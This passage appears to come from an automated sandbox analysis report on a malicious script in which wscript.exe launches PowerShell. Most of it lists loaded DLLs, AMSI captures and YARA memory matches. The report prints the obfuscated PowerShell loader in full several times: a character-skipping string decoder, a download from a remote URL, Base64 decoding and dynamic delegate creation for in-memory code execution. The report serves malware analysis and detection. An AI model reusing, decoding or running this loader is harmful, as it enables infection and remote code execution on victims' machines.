ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("Powershell " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization ", "0")
              Source: Yara match | File source: 0000000D.00000002.2577528361.000000000A45F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2577384991.00000000088A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((wigans $Djiboutieres $Unrobustness), (Trmnds @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afhndende = [AppDomain]::CurrentDomain.GetAssemblies()$global:
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Gimmerlams)), $Podosperm).DefineDynamicModule($Udsvejfninger, $false).DefineType($Helicteres, $Miljplaner, [System.MulticastDelegate])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Illaqueable)$gloBaL:fireSIdE = [sYSteM.TExT.eNCODiNG]::AScIi.geTSTrinG($BomByciLlA)$GLObal:pylorOUs69=$fIresIde.SUbsTrINg($kATinaNTerGRaFt12,$KlANdREt)<#Successorship Detentionslokal
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACBA6F97 push esp; retf 4_2_00007FFAACBA6F98
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACC716A1 pushad ; retf 4_2_00007FFAACC716C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACC76855 push 30D00000h; retf 4_2_00007FFAACC7685A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_073B279D push esp; ret 13_2_073B27A5
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries in the report)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (82 identical entries in the report)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
